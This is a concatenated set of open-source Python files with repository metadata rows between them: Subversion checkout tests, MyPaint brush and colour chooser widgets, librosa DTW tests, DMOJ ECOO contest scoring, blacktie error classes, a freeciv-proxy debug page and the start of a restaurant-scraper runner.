'A/D/M/chi' : Item(status=' ', copied='+', wc_rev='-'),
'A/D/M/omega' : Item(status=' ', copied='+', wc_rev='-'),
'A/D/M/I' : Item(status='A ', copied='+', wc_rev='-',
entry_status=' '), # A/D/MI is a new op_root
'A/D/M/I/J' : Item(status=' ', copied='+', wc_rev='-'),
'A/D/M/I/K' : Item(status=' ', copied='+', wc_rev='-'),
'A/D/M/I/K/xi' : Item(status=' ', copied='+', wc_rev='-'),
'A/D/M/I/K/eta' : Item(status=' ', copied='+', wc_rev='-'),
'A/D/M/I/L' : Item(status=' ', copied='+', wc_rev='-'),
})
svntest.actions.run_and_verify_status(wc_dir, expected_status)
expected_output = wc.State(wc_dir, {
'A/D/M' : Item(status=' ', treeconflict='C'),
'A/D/M/rho' : Item(status=' ', treeconflict='A'),
'A/D/M/pi' : Item(status=' ', treeconflict='A'),
'A/D/M/tau' : Item(status=' ', treeconflict='A'),
})
expected_disk = wc.State('', {
'gamma' : Item("This is the file 'gamma'.\n"),
'G/pi' : Item("This is the file 'pi'.\n"),
'G/rho' : Item("This is the file 'rho'.\n"),
'G/tau' : Item("This is the file 'tau'.\n"),
'H/I' : Item(),
'H/I/J' : Item(),
'H/I/K' : Item(),
'H/I/K/xi' : Item("This is file 'xi'\n"),
'H/I/K/eta' : Item("This is REPOS file 'eta'\n"),
'H/I/L' : Item(),
'H/chi' : Item("This is the file 'chi'.\n"),
'H/psi' : Item("This is the file 'psi'.\n"),
'H/omega' : Item("This is the file 'omega'.\n"),
'M/I' : Item(),
'M/I/J' : Item(),
'M/I/K' : Item(),
'M/I/K/xi' : Item("This is file 'xi'\n"),
'M/I/K/eta' : Item("This is REPOS file 'eta'\n"),
'M/I/L' : Item(),
'M/chi' : Item("This is the file 'chi'.\n"),
'M/psi' : Item("This is the file 'psi'.\n"),
'M/omega' : Item("This is the file 'omega'.\n"),
'kappa' : Item("This is REPOS file 'kappa'\n"),
})
svntest.actions.run_and_verify_checkout(sbox.repo_url + '/A/D',
D_path,
expected_output,
expected_disk,
[], '--force')
expected_status.tweak('A/D/M', treeconflict='C', status='R ')
expected_status.tweak(
'A/D',
'A/D/G',
'A/D/G/pi',
'A/D/G/rho',
'A/D/G/tau',
'A/D/gamma',
'A/D/kappa',
'A/D/H',
'A/D/H/I',
'A/D/H/I/J',
'A/D/H/I/K',
'A/D/H/I/K/xi',
'A/D/H/I/K/eta',
'A/D/H/I/L', wc_rev=4)
expected_status.add({
'A/D/H/chi' : Item(status=' ', wc_rev=4),
'A/D/H/psi' : Item(status=' ', wc_rev=4),
'A/D/H/omega' : Item(status=' ', wc_rev=4),
'A/D/M/pi' : Item(status='D ', wc_rev=4),
'A/D/M/rho' : Item(status='D ', wc_rev=4),
'A/D/M/tau' : Item(status='D ', wc_rev=4),
})
svntest.actions.run_and_verify_status(wc_dir, expected_status)
# Try to co omicron's parent.
expected_output = wc.State(wc_dir, {
'A/B/F/omicron' : Item(status=' ', treeconflict='C'),
})
expected_disk = wc.State('', {
'omicron' : Item("This is the file 'chi'.\n"),
})
svntest.actions.run_and_verify_checkout(sbox.repo_url + '/A/B/F',
F_path,
expected_output,
expected_disk,
[], '--force')
expected_status.tweak('A/B/F/omicron', treeconflict='C', status='R ')
expected_status.add({
'A/B/F' : Item(status=' ', wc_rev=4),
})
svntest.actions.run_and_verify_status(wc_dir, expected_status)
#----------------------------------------------------------------------
# Test if checking out from a Windows driveroot is supported.
@SkipUnless(svntest.main.is_os_windows)
def checkout_wc_from_drive(sbox):
"checkout from the root of a Windows drive"
def find_the_next_available_drive_letter():
"find the first available drive"
# get the list of used drive letters, use some Windows specific function.
try:
import win32api
drives=win32api.GetLogicalDriveStrings()
drives=drives.split('\000')
for d in range(ord('G'), ord('Z')+1):
drive = chr(d)
if not drive + ':\\' in drives:
return drive
except ImportError:
# In ActiveState python x64 win32api is not available
for d in range(ord('G'), ord('Z')+1):
drive = chr(d)
if not os.path.isdir(drive + ':\\'):
return drive
return None
# just create an empty folder, we'll checkout later.
sbox.build(create_wc = False)
svntest.main.safe_rmtree(sbox.wc_dir)
os.mkdir(sbox.wc_dir)
# create a virtual drive to the repository folder
drive = find_the_next_available_drive_letter()
if drive is None:
raise svntest.Skip('No drive letter available')
subprocess.call(['subst', drive +':', sbox.repo_dir])
repo_url = 'file:///' + drive + ':/'
wc_dir = sbox.wc_dir
was_cwd = os.getcwd()
try:
expected_wc = svntest.main.greek_state.copy()
expected_output = wc.State(wc_dir, {
'A' : Item(status='A '),
'A/D' : Item(status='A '),
'A/D/H' : Item(status='A '),
'A/D/H/psi' : Item(status='A '),
'A/D/H/chi' : Item(status='A '),
'A/D/H/omega' : Item(status='A '),
'A/D/G' : Item(status='A '),
'A/D/G/tau' : Item(status='A '),
'A/D/G/pi' : Item(status='A '),
'A/D/G/rho' : Item(status='A '),
'A/D/gamma' : Item(status='A '),
'A/C' : Item(status='A '),
'A/mu' : Item(status='A '),
'A/B' : Item(status='A '),
'A/B/E' : Item(status='A '),
'A/B/E/alpha' : Item(status='A '),
'A/B/E/beta' : Item(status='A '),
'A/B/F' : Item(status='A '),
'A/B/lambda' : Item(status='A '),
'iota' : Item(status='A '),
})
svntest.actions.run_and_verify_checkout(repo_url, wc_dir,
expected_output, expected_wc)
wc2_dir = sbox.add_wc_path('2')
expected_output = wc.State(wc2_dir, {
'D' : Item(status='A '),
'D/H' : Item(status='A '),
'D/H/psi' : Item(status='A '),
'D/H/chi' : Item(status='A '),
'D/H/omega' : Item(status='A '),
'D/G' : Item(status='A '),
'D/G/tau' : Item(status='A '),
'D/G/pi' : Item(status='A '),
'D/G/rho' : Item(status='A '),
'D/gamma' : Item(status='A '),
'C' : Item(status='A '),
'mu' : Item(status='A '),
'B' : Item(status='A '),
'B/E' : Item(status='A '),
'B/E/alpha' : Item(status='A '),
'B/E/beta' : Item(status='A '),
'B/F' : Item(status='A '),
'B/lambda' : Item(status='A '),
})
expected_wc = wc.State('', {
'C' : Item(),
'B/E/beta' : Item(contents="This is the file 'beta'.\n"),
'B/E/alpha' : Item(contents="This is the file 'alpha'.\n"),
'B/lambda' : Item(contents="This is the file 'lambda'.\n"),
'B/F' : Item(),
'D/H/omega' : Item(contents="This is the file 'omega'.\n"),
'D/H/psi' : Item(contents="This is the file 'psi'.\n"),
'D/H/chi' : Item(contents="This is the file 'chi'.\n"),
'D/G/rho' : Item(contents="This is the file 'rho'.\n"),
'D/G/tau' : Item(contents="This is the file 'tau'.\n"),
'D/G/pi' : Item(contents="This is the file 'pi'.\n"),
'D/gamma' : Item(contents="This is the file 'gamma'.\n"),
'mu' : Item(contents="This is the file 'mu'.\n"),
})
svntest.actions.run_and_verify_checkout(repo_url + '/A', wc2_dir,
expected_output, expected_wc)
wc3_dir = sbox.add_wc_path('3')
expected_output = wc.State(wc3_dir, {
'H' : Item(status='A '),
'H/psi' : Item(status='A '),
'H/chi' : Item(status='A '),
'H/omega' : Item(status='A '),
'G' : Item(status='A '),
'G/tau' : Item(status='A '),
'G/pi' : Item(status='A '),
'G/rho' : Item(status='A '),
'gamma' : Item(status='A '),
})
expected_wc = wc.State('', {
'H/chi' : Item(contents="This is the file 'chi'.\n"),
'H/psi' : Item(contents="This is the file 'psi'.\n"),
'H/omega' : Item(contents="This is the file 'omega'.\n"),
'G/pi' : Item(contents="This is the file 'pi'.\n"),
'G/tau' : Item(contents="This is the file 'tau'.\n"),
'G/rho' : Item(contents="This is the file 'rho'.\n"),
'gamma' : Item(contents="This is the file 'gamma'.\n"),
})
svntest.actions.run_and_verify_checkout(repo_url + '/A/D', wc3_dir,
expected_output, expected_wc)
finally:
os.chdir(was_cwd)
# cleanup the virtual drive
subprocess.call(['subst', '/D', drive +':'])
#----------------------------------------------------------------------
# list all tests here, starting with None:
test_list = [ None,
checkout_with_obstructions,
forced_checkout_of_file_with_dir_obstructions,
forced_checkout_of_dir_with_file_obstructions,
forced_checkout_with_faux_obstructions,
forced_checkout_with_real_obstructions,
forced_checkout_with_real_obstructions_and_unversioned_files,
forced_checkout_with_versioned_obstruction,
import_and_checkout,
checkout_broken_eol,
checkout_creates_intermediate_folders,
checkout_peg_rev,
checkout_peg_rev_date,
co_with_obstructing_local_adds,
checkout_wc_from_drive
]
if __name__ == "__main__":
svntest.main.run_tests(test_list)
# NOTREACHED
### End of file.
| apache-2.0 | 128,054,262,028,547,570 | 38.816983 | 80 | 0.522237 | false |
dothiko/mypaint | gui/quickchoice.py | 1 | 11387 | # This file is part of MyPaint.
# Copyright (C) 2013 by Andrew Chadwick <[email protected]>
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
"""Widgets and popup dialogs for making quick choices"""
## Imports
import abc
import gi
from gi.repository import Gtk
from gi.repository import Gdk
from pixbuflist import PixbufList
import brushmanager
import widgets
import spinbox
import windowing
from lib.observable import event
import gui.colortools
## Module consts
_DEFAULT_PREFS_ID = u"default"
## Interfaces
class Advanceable:
"""Interface for choosers which can be advanced by pressing keys.
Advancing happens if the chooser is already visible and its key is
pressed again. This can happen repeatedly. The actual action
performed is up to the implementation: advancing some some choosers
may move them forward through pages of alternatives, while other
choosers may actually change a brush setting as they advance.
"""
__metaclass__ = abc.ABCMeta
@abc.abstractmethod
def advance(self):
"""Advances the chooser to the next page or choice.
Choosers should remain open when their advance() method is
invoked. The actual action performed is up to the concrete
implementation: see the class docs.
"""
## Class defs
class QuickBrushChooser (Gtk.VBox):
"""A quick chooser widget for brushes"""
## Class constants
_PREFS_KEY_TEMPLATE = u"brush_chooser.%s.selected_group"
ICON_SIZE = 48
## Method defs
def __init__(self, app, prefs_id=_DEFAULT_PREFS_ID):
"""Initialize"""
Gtk.VBox.__init__(self)
self.app = app
self.bm = app.brushmanager
self._prefs_key = self._PREFS_KEY_TEMPLATE % (prefs_id,)
active_group_name = app.preferences.get(self._prefs_key, None)
model = self._make_groups_sb_model()
self.groups_sb = spinbox.ItemSpinBox(model, self._groups_sb_changed_cb,
active_group_name)
active_group_name = self.groups_sb.get_value()
brushes = self.bm.groups[active_group_name][:]
self.brushlist = PixbufList(brushes, self.ICON_SIZE, self.ICON_SIZE,
namefunc=lambda x: x.name,
pixbuffunc=lambda x: x.preview)
self.brushlist.dragging_allowed = False
self.bm.groups_changed += self._update_groups_sb
self.brushlist.item_selected += self._item_selected_cb
scrolledwin = Gtk.ScrolledWindow()
scrolledwin.set_policy(Gtk.PolicyType.NEVER, Gtk.PolicyType.ALWAYS)
scrolledwin.add_with_viewport(self.brushlist)
w = int(self.ICON_SIZE * 4.5)
h = int(self.ICON_SIZE * 5.0)
scrolledwin.set_min_content_width(w)
scrolledwin.set_min_content_height(h)
scrolledwin.get_child().set_size_request(w, h)
self.pack_start(self.groups_sb, False, False)
self.pack_start(scrolledwin, True, True)
self.set_spacing(widgets.SPACING_TIGHT)
def _item_selected_cb(self, pixbuf_list, brush):
"""Internal: call brush_selected event when an item is chosen"""
self.brush_selected(brush)
@event
def brush_selected(self, brush):
"""Event: a brush was selected
:param brush: The newly chosen brush
"""
def _make_groups_sb_model(self):
"""Internal: create the model for the group choice spinbox"""
group_names = self.bm.groups.keys()
group_names.sort()
model = []
for name in group_names:
label_text = brushmanager.translate_group_name(name)
model.append((name, label_text))
return model
def _update_groups_sb(self, bm):
"""Internal: update the spinbox model at the top of the widget"""
model = self._make_groups_sb_model()
self.groups_sb.set_model(model)
def _groups_sb_changed_cb(self, group_name):
"""Internal: update the list of brush icons when the group changes"""
self.app.preferences[self._prefs_key] = group_name
self.brushlist.itemlist[:] = self.bm.groups[group_name][:]
self.brushlist.update()
def advance(self):
"""Advances to the next page of brushes."""
self.groups_sb.next()
class BrushChooserPopup (windowing.ChooserPopup):
"""Speedy brush chooser popup"""
def __init__(self, app, prefs_id=_DEFAULT_PREFS_ID):
"""Initialize.
:param gui.application.Application app: main app instance
:param unicode prefs_id: prefs identifier for the chooser
The prefs identifier forms part of preferences key which store
layout and which page of the chooser is selected. It should
follow the same syntax rules as Python simple identifiers.
"""
windowing.ChooserPopup.__init__(
self,
app = app,
actions = [
'ColorChooserPopup',
'ColorChooserPopupFastSubset',
'BrushChooserPopup',
],
config_name = "brush_chooser.%s" % (prefs_id,),
)
self._chosen_brush = None
self._chooser = QuickBrushChooser(app, prefs_id=prefs_id)
self._chooser.brush_selected += self._brush_selected_cb
bl = self._chooser.brushlist
bl.connect("button-release-event", self._brushlist_button_release_cb)
self.add(self._chooser)
def _brush_selected_cb(self, chooser, brush):
"""Internal: update the response brush when an icon is clicked"""
self._chosen_brush = brush
def _brushlist_button_release_cb(self, *junk):
"""Internal: send an accept response on a button release
We only send the response (and close the dialog) on button release to
avoid accidental dabs with the stylus.
"""
if self._chosen_brush is not None:
bm = self.app.brushmanager
bm.select_brush(self._chosen_brush)
self.hide()
self._chosen_brush = None
def advance(self):
"""Advances to the next page of brushes."""
self._chooser.advance()
class QuickColorChooser (Gtk.VBox):
"""A quick chooser widget for colors"""
## Class constants
_PREFS_KEY_TEMPLATE = u"color_chooser.%s.selected_adjuster"
_ALL_ADJUSTER_CLASSES = [
gui.colortools.HCYWheelTool,
gui.colortools.HSVWheelTool,
gui.colortools.PaletteTool,
gui.colortools.HSVCubeTool,
gui.colortools.HSVSquareTool,
gui.colortools.ComponentSlidersTool,
gui.colortools.RingsColorChangerTool,
gui.colortools.WashColorChangerTool,
gui.colortools.CrossedBowlColorChangerTool,
]
_SINGLE_CLICK_ADJUSTER_CLASSES = [
gui.colortools.PaletteTool,
gui.colortools.WashColorChangerTool,
gui.colortools.CrossedBowlColorChangerTool,
]
def __init__(self, app, prefs_id=_DEFAULT_PREFS_ID, single_click=False):
Gtk.VBox.__init__(self)
self._app = app
self._spinbox_model = []
self._adjs = {}
self._pages = []
mgr = app.brush_color_manager
if single_click:
adjuster_classes = self._SINGLE_CLICK_ADJUSTER_CLASSES
else:
adjuster_classes = self._ALL_ADJUSTER_CLASSES
for page_class in adjuster_classes:
name = page_class.__name__
page = page_class()
self._pages.append(page)
self._spinbox_model.append((name, page.tool_widget_title))
self._adjs[name] = page
page.set_color_manager(mgr)
if page_class in self._SINGLE_CLICK_ADJUSTER_CLASSES:
page.connect_after(
"button-release-event",
self._ccwidget_btn_release_cb,
)
self._prefs_key = self._PREFS_KEY_TEMPLATE % (prefs_id,)
active_page = app.preferences.get(self._prefs_key, None)
sb = spinbox.ItemSpinBox(self._spinbox_model, self._spinbox_changed_cb,
active_page)
active_page = sb.get_value()
self._spinbox = sb
self._active_adj = self._adjs[active_page]
self.pack_start(sb, False, False, 0)
self.pack_start(self._active_adj, True, True, 0)
self.set_spacing(widgets.SPACING_TIGHT)
def _spinbox_changed_cb(self, page_name):
self._app.preferences[self._prefs_key] = page_name
self.remove(self._active_adj)
new_adj = self._adjs[page_name]
self._active_adj = new_adj
self.pack_start(self._active_adj, True, True, 0)
self._active_adj.show_all()
def _ccwidget_btn_release_cb(self, ccwidget, event):
"""Internal: fire "choice_completed" after clicking certain widgets"""
self.choice_completed()
return False
@event
def choice_completed(self):
"""Event: a complete selection was made
This is emitted by button-release events on certain kinds of colour
chooser page. Not every page in the chooser emits this event, because
colour is a three-dimensional quantity: clicking on a two-dimensional
popup can't make a complete choice of colour with most pages.
The palette page does emit this event, and it's the default.
"""
def advance(self):
"""Advances to the next color selector."""
self._spinbox.next()
class ColorChooserPopup (windowing.ChooserPopup):
"""Speedy color chooser dialog"""
def __init__(self, app, prefs_id=_DEFAULT_PREFS_ID, single_click=False):
"""Initialize.
:param gui.application.Application app: main app instance
:param unicode prefs_id: prefs identifier for the chooser
:param bool single_click: limit to just the single-click adjusters
The prefs identifier forms part of preferences key which store
layout and which page of the chooser is selected. It should
follow the same syntax rules as Python simple identifiers.
"""
windowing.ChooserPopup.__init__(
self,
app = app,
actions = [
'ColorChooserPopup',
'ColorChooserPopupFastSubset',
'BrushChooserPopup',
],
config_name = u"color_chooser.%s" % (prefs_id,),
)
self._chooser = QuickColorChooser(
app,
prefs_id=prefs_id,
single_click=single_click,
)
self._chooser.choice_completed += self._choice_completed_cb
self.add(self._chooser)
def _choice_completed_cb(self, chooser):
"""Internal: close when a choice is (fully) made
Close the dialog on button release only to avoid accidental dabs
with the stylus.
"""
self.hide()
def advance(self):
"""Advances to the next color selector."""
self._chooser.advance()
## Classes: interface registration
Advanceable.register(QuickBrushChooser)
Advanceable.register(QuickColorChooser)
Advanceable.register(BrushChooserPopup)
Advanceable.register(ColorChooserPopup)
| gpl-2.0 | -8,399,897,937,898,774,000 | 32.889881 | 79 | 0.626855 | false |
r9y9/librosa | tests/test_dtw.py | 1 | 4618 | #!/usr/bin/env python
# -*- encoding: utf-8 -*-
import librosa
import numpy as np
from scipy.spatial.distance import cdist
from nose.tools import raises
from test_core import srand
import warnings
warnings.resetwarnings()
warnings.simplefilter('always')
@raises(librosa.ParameterError)
def test_1d_input():
X = np.array([[1], [3], [3], [8], [1]])
Y = np.array([[2], [0], [0], [8], [7], [2]])
librosa.dtw(X=X, Y=Y)
def test_dtw_global():
# Example taken from:
# Meinard Mueller, Fundamentals of Music Processing
X = np.array([[1, 3, 3, 8, 1]])
Y = np.array([[2, 0, 0, 8, 7, 2]])
gt_D = np.array([[1., 2., 3., 10., 16., 17.],
[2., 4., 5., 8., 12., 13.],
[3., 5., 7., 10., 12., 13.],
[9., 11., 13., 7., 8., 14.],
[10, 10., 11., 14., 13., 9.]])
mut_D, _ = librosa.dtw(X, Y)
assert np.array_equal(gt_D, mut_D)
def test_dtw_global_supplied_distance_matrix():
# Example taken from:
# Meinard Mueller, Fundamentals of Music Processing
X = np.array([[1, 3, 3, 8, 1]])
Y = np.array([[2, 0, 0, 8, 7, 2]])
# Precompute distance matrix.
C = cdist(X.T, Y.T, metric='euclidean')
gt_D = np.array([[1., 2., 3., 10., 16., 17.],
[2., 4., 5., 8., 12., 13.],
[3., 5., 7., 10., 12., 13.],
[9., 11., 13., 7., 8., 14.],
[10, 10., 11., 14., 13., 9.]])
# Supply precomputed distance matrix and specify an invalid distance
# metric to verify that it isn't used.
mut_D, _ = librosa.dtw(C=C, metric='invalid')
assert np.array_equal(gt_D, mut_D)
@raises(librosa.ParameterError)
def test_dtw_incompatible_args_01():
librosa.dtw(C=1, X=1, Y=1)
@raises(librosa.ParameterError)
def test_dtw_incompatible_args_02():
librosa.dtw(C=None, X=None, Y=None)
def test_dtw_global_diagonal():
# query is a linear ramp
X = np.linspace(0.1, 1, 10)
Y = X
gt_wp = list(zip(list(range(10)), list(range(10))))[::-1]
mut_D, mut_wp = librosa.dtw(X, Y, subseq=True, metric='cosine',
step_sizes_sigma=np.array([[1, 1]]),
weights_mul=np.array([1, ]))
assert np.array_equal(np.asarray(gt_wp), np.asarray(mut_wp))
def test_dtw_subseq():
srand()
# query is a linear ramp
X = np.linspace(0, 1, 100)
# database is query surrounded by noise
noise_len = 200
noise = np.random.rand(noise_len)
Y = np.concatenate((noise, noise, X, noise))
_, mut_wp = librosa.dtw(X, Y, subseq=True)
# estimated sequence has to match original sequence
# note the +1 due to python indexing
mut_X = Y[mut_wp[-1][1]:mut_wp[0][1] + 1]
assert np.array_equal(X, mut_X)
def test_dtw_subseq_sym():
Y = np.array([10., 10., 0., 1., 2., 3., 10., 10.])
X = np.arange(4)
gt_wp_XY = np.array([[3, 5], [2, 4], [1, 3], [0, 2]])
gt_wp_YX = np.array([[5, 3], [4, 2], [3, 1], [2, 0]])
_, mut_wp_XY = librosa.dtw(X, Y, subseq=True)
_, mut_wp_YX = librosa.dtw(Y, X, subseq=True)
assert np.array_equal(gt_wp_XY, mut_wp_XY)
assert np.array_equal(gt_wp_YX, mut_wp_YX)
def test_dtw_fill_off_diagonal_8_8():
# Case 1: Square matrix (N=M)
mut_x = np.ones((8, 8))
librosa.fill_off_diagonal(mut_x, 0.25)
gt_x = np.array([[1, 1, 0, 0, 0, 0, 0, 0],
[1, 1, 1, 0, 0, 0, 0, 0],
[0, 1, 1, 1, 0, 0, 0, 0],
[0, 0, 1, 1, 1, 0, 0, 0],
[0, 0, 0, 1, 1, 1, 0, 0],
[0, 0, 0, 0, 1, 1, 1, 0],
[0, 0, 0, 0, 0, 1, 1, 1],
[0, 0, 0, 0, 0, 0, 1, 1]])
assert np.array_equal(mut_x, gt_x)
assert np.array_equal(mut_x, gt_x.T)
def test_dtw_fill_off_diagonal_8_12():
# Case 2a: N!=M
mut_x = np.ones((8, 12))
librosa.fill_off_diagonal(mut_x, 0.25)
gt_x = np.array([[1, 1, 1, 1, 1, 1, 0, 0, 0, 0, 0, 0],
[1, 1, 1, 1, 1, 1, 1, 0, 0, 0, 0, 0],
[0, 1, 1, 1, 1, 1, 1, 1, 0, 0, 0, 0],
[0, 0, 1, 1, 1, 1, 1, 1, 1, 0, 0, 0],
[0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 0, 0],
[0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 0],
[0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1],
[0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1]])
assert np.array_equal(mut_x, gt_x)
# Case 2b: (N!=M).T
mut_x = np.ones((8, 12)).T
librosa.fill_off_diagonal(mut_x, 0.25)
assert np.array_equal(mut_x, gt_x.T)
| isc | 9,132,003,934,053,464,000 | 28.414013 | 72 | 0.482027 | false |
DMOJ/site | judge/contest_format/ecoo.py | 1 | 5695 | from datetime import timedelta
from django.core.exceptions import ValidationError
from django.db.models import Count, Max, OuterRef, Subquery
from django.template.defaultfilters import floatformat
from django.urls import reverse
from django.utils.html import format_html
from django.utils.safestring import mark_safe
from django.utils.translation import gettext_lazy
from judge.contest_format.default import DefaultContestFormat
from judge.contest_format.registry import register_contest_format
from judge.utils.timedelta import nice_repr
@register_contest_format('ecoo')
class ECOOContestFormat(DefaultContestFormat):
name = gettext_lazy('ECOO')
config_defaults = {'cumtime': False, 'first_ac_bonus': 10, 'time_bonus': 5}
config_validators = {'cumtime': lambda x: True, 'first_ac_bonus': lambda x: x >= 0, 'time_bonus': lambda x: x >= 0}
'''
cumtime: Specify True if cumulative time is to be used in breaking ties. Defaults to False.
first_ac_bonus: The number of points to award if a solution gets AC on its first non-IE/CE run. Defaults to 10.
time_bonus: Number of minutes to award an extra point for submitting before the contest end.
Specify 0 to disable. Defaults to 5.
'''
@classmethod
def validate(cls, config):
if config is None:
return
if not isinstance(config, dict):
raise ValidationError('ECOO-styled contest expects no config or dict as config')
for key, value in config.items():
if key not in cls.config_defaults:
raise ValidationError('unknown config key "%s"' % key)
if not isinstance(value, type(cls.config_defaults[key])):
raise ValidationError('invalid type for config key "%s"' % key)
if not cls.config_validators[key](value):
raise ValidationError('invalid value "%s" for config key "%s"' % (value, key))
def __init__(self, contest, config):
self.config = self.config_defaults.copy()
self.config.update(config or {})
self.contest = contest
def update_participation(self, participation):
cumtime = 0
score = 0
format_data = {}
submissions = participation.submissions.exclude(submission__result__in=('IE', 'CE'))
submission_counts = {
data['problem_id']: data['count'] for data in submissions.values('problem_id').annotate(count=Count('id'))
}
queryset = (
submissions
.values('problem_id')
.filter(
submission__date=Subquery(
submissions
.filter(problem_id=OuterRef('problem_id'))
.order_by('-submission__date')
.values('submission__date')[:1],
),
)
.annotate(points=Max('points'))
.values_list('problem_id', 'problem__points', 'points', 'submission__date')
)
for problem_id, problem_points, points, date in queryset:
sub_cnt = submission_counts.get(problem_id, 0)
dt = (date - participation.start).total_seconds()
bonus = 0
if points > 0:
# First AC bonus
if sub_cnt == 1 and points == problem_points:
bonus += self.config['first_ac_bonus']
# Time bonus
if self.config['time_bonus']:
bonus += (participation.end_time - date).total_seconds() // 60 // self.config['time_bonus']
format_data[str(problem_id)] = {'time': dt, 'points': points, 'bonus': bonus}
for data in format_data.values():
if self.config['cumtime']:
cumtime += data['time']
score += data['points'] + data['bonus']
participation.cumtime = cumtime
participation.score = score
participation.tiebreaker = 0
participation.format_data = format_data
participation.save()
def display_user_problem(self, participation, contest_problem):
format_data = (participation.format_data or {}).get(str(contest_problem.id))
if format_data:
bonus = format_html('<small> +{bonus}</small>',
bonus=floatformat(format_data['bonus'])) if format_data['bonus'] else ''
return format_html(
'<td class="{state}"><a href="{url}">{points}{bonus}<div class="solving-time">{time}</div></a></td>',
state=(('pretest-' if self.contest.run_pretests_only and contest_problem.is_pretested else '') +
self.best_solution_state(format_data['points'], contest_problem.points)),
url=reverse('contest_user_submissions',
args=[self.contest.key, participation.user.user.username, contest_problem.problem.code]),
points=floatformat(format_data['points']),
bonus=bonus,
time=nice_repr(timedelta(seconds=format_data['time']), 'noday'),
)
else:
return mark_safe('<td></td>')
def display_participation_result(self, participation):
return format_html(
'<td class="user-points"><a href="{url}">{points}<div class="solving-time">{cumtime}</div></a></td>',
url=reverse('contest_all_user_submissions',
args=[self.contest.key, participation.user.user.username]),
points=floatformat(participation.score, -self.contest.points_precision),
cumtime=nice_repr(timedelta(seconds=participation.cumtime), 'noday') if self.config['cumtime'] else '',
)
| agpl-3.0 | 3,515,321,392,959,316,000 | 43.84252 | 119 | 0.597542 | false |
xguse/blacktie | src/blacktie/utils/errors.py | 1 | 2796 | #*****************************************************************************
# errors.py (part of the blacktie package)
#
# (c) 2013 - Augustine Dunn
# James Laboratory
# Department of Biochemistry and Molecular Biology
# University of California Irvine
# [email protected]
#
# Licenced under the GNU General Public License 3.0 license.
#******************************************************************************
"""
####################
errors.py
####################
Code defining custom base error classes to provide a foundation for graceful error handling.
"""
import warnings
class BlacktieError(StandardError):
"""Base class for exceptions in the blacktie package."""
pass
class SystemCallError(BlacktieError):
"""Error raised when a problem occurs while attempting to run an external system call.
Attributes:
| ``errno`` -- return code from system call
| ``filename`` -- file in volved if any
| ``strerror`` -- error msg """
def __init__(self,errno,strerror,filename=None):
self.errno = errno
self.strerror = strerror
self.filename = filename
def __str__(self):
if not self.filename:
return """ERROR:\n %s.\nRETURN_STATE: %s.""" % (self.strerror.strip('\n'),
self.errno)
else:
return """ERROR in %s:\n %s.\nRETURN_STATE: %s.""" % (self.filename,
self.strerror.strip('\n'),
self.errno)
class SanityCheckError(BlacktieError):
"""When a 'state check' comes back as conflicting or nonsensical."""
pass
class UnexpectedValueError(BlacktieError):
"""When values that "should" not be possible happen; like if a variable was changed unexpectedly."""
pass
class InvalidFileFormatError(BlacktieError):
"""When errors occur due to malformed file formats."""
pass
class MissingArgumentError(BlacktieError):
"""When a required argument is missing from the parsed command line options."""
def __init__(self,errMsg):
self.msg = errMsg
def __str__(self):
return """ERROR: %s""" % (self.msg)
class InvalidOptionError(BlacktieError):
def __init__(self,optVal,optName,validVals=None):
self.optVal = optVal
self.optName = optName
self.validVals = validVals
def __str__(self):
if self.validVals:
return """ERROR: %s is not a valid value for arg:%s.\n\tValid values are: %s""" % (self.optVal,self.optName,self.validVals)
else:
return """ERROR: %s is not a valid value for arg:%s.""" % (self.optVal,self.optName)
| gpl-3.0 | 6,638,738,641,271,444,000 | 30.784091 | 135 | 0.554006 | false |
andreasrosdal/freeciv-web | freeciv-proxy/debugging.py | 2 | 2198 | # -*- coding: utf-8 -*-
'''
Freeciv - Copyright (C) 2009-2017 - Andreas Røsdal [email protected]
This program is free software; you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation; either version 2, or (at your option)
any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
'''
import sys
from time import gmtime, strftime
import os
import platform
import threading
import time
from tornado import version as tornado_version
import gc
startTime = time.time()
def get_debug_info(civcoms):
code = "<html><head><meta http-equiv=\"refresh\" content=\"20\">" \
+ "<link href='/css/bootstrap.min.css' rel='stylesheet'></head>" \
+ "<body><div class='container'>" \
+ "<h2>Freeciv WebSocket Proxy Status</h2>" \
+ "<font color=\"green\">Process status: OK</font><br>"
code += "<b>Process Uptime: " + \
str(int(time.time() - startTime)) + " s.</b><br>"
code += ("Python version: %s %s (%s)<br>" % (
platform.python_implementation(),
platform.python_version(),
platform.python_build()[0],
))
cpu = ' '.join(platform.processor().split())
code += ("Platform: %s %s on '%s' <br>" % (
platform.machine(),
platform.system(),
cpu))
code += ("Tornado version %s <br>" % (tornado_version))
code += ("Number of threads: %i <br>" % (threading.activeCount()))
try:
code += ("<h3>Logged in users (count %i) :</h3>" % len(civcoms))
for key in list(civcoms.keys()):
code += (
"username: <b>%s</b> <br>Civserver: %d<br>Connect time: %d<br><br>" %
(civcoms[key].username,
civcoms[key].civserverport,
time.time() - civcoms[key].connect_time))
except:
print(("Unexpected error:" + str(sys.exc_info()[0])))
raise
code += "</div></body></html>"
return code
| agpl-3.0 | -2,271,606,199,374,323,700 | 31.308824 | 85 | 0.600364 | false |
rconjaerts/uniresto-scraper | main.py | 1 | 2281 | import io
import os
import json
import requests
import logging
from multiprocessing import Pool, cpu_count
from multiprocessing.dummy import Pool as ThreadPool
import config
from uniresto.util.mplog import MultiProcessingLog
import uniscrapers
mplog = MultiProcessingLog(config.LOG_FILENAME, 'a', 0, 0)
mplog.setFormatter(logging.Formatter(config.LOG_FORMAT))
logging.basicConfig(level=logging.WARNING) # TODO: logging.WARNING
logging.getLogger().addHandler(mplog)
_instances = {}
def find_scrapers():
"""Returns a list of Scraper subclass instances
"""
plugins = []
for class_name in uniscrapers.__all__:
cls = getattr(uniscrapers, class_name)
# Only instantiate each plugin class once.
if class_name not in _instances:
_instances[class_name] = cls()
plugins.append(_instances[class_name])
return plugins
def dump(data, filename):
# TODO: remove filename param when we are exporting to server
# This JSON writing business is temporary, until the server is ready
